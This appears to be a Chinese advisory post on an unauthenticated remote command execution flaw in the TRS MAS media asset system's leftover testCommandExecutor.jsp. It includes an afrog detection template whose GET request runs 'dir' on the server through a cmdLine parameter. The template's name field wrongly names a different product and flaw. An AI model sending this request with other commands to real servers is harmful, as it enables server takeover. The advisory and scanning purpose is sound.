拓尔思 MAS testCommandExecutorjsp 远程命令执行漏洞

漏洞信息

漏洞名称: 拓尔思 MAS testCommandExecutor.jsp 远程命令执行漏洞

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 拓尔思MAS媒资管理系统是一款用于媒体资源管理的系统,广泛应用于各类媒体机构和企业中,用于管理和分发媒体内容。该系统提供了一个登录页面和多个管理功能模块,是企业级媒体资源管理的核心组件之一。该系统中的testCommandExecutor.jsp测试文件存在远程命令执行漏洞,当网站运维者未删除此测试文件时,攻击者可以利用该漏洞执行任意命令,进而获取服务器权限。漏洞的技术根源在于系统未能对testCommandExecutor.jsp文件进行适当的访问控制和输入验证,导致攻击者可以通过构造特定的HTTP请求,直接向服务器发送恶意命令。此漏洞的利用无需认证,攻击者可以直接通过网络访问漏洞文件,实现远程代码执行,对服务器安全构成严重威胁。攻击者可以利用此漏洞进行数据泄露、服务中断等恶意操作,对企业的信息安全造成严重影响。

产品厂商: 拓尔思

产品名称: MAS媒资管理系统

来源: https://github.com/zan8in/afrog/blob/89bfabcff982e1109bcaa6ece0d23f5105497a67/pocs%2Fafrog-pocs%2Fvulnerability%2Fmax-test-command-executor-rce.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

id: max-test-command-executor-rce

info:
name: 紫光档案管理系统 upload.html 后台文件上传漏洞
author: zan8in
severity: high
verified: true
description: |
拓尔思 MAS testCommandExecutor.jsp测试文件存在远程命令执行漏洞,当网站运维者未删除测试文件时,攻击者通过漏洞可以获取服务器权限
"MAS媒资管理系统登录页面"

rules:
r0:
request:
method: GET
path: /mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=
expression: response.status == 200 && response.body.ibcontains(b'D:\\TRS\\TRSMAS\\')
expression: r0()



拓尔思 MAS testCommandExecutorjsp 远程命令执行漏洞
http://example.com/2025/07/30/github_3670792414/
作者
lianccc
发布于
2025年7月30日
许可协议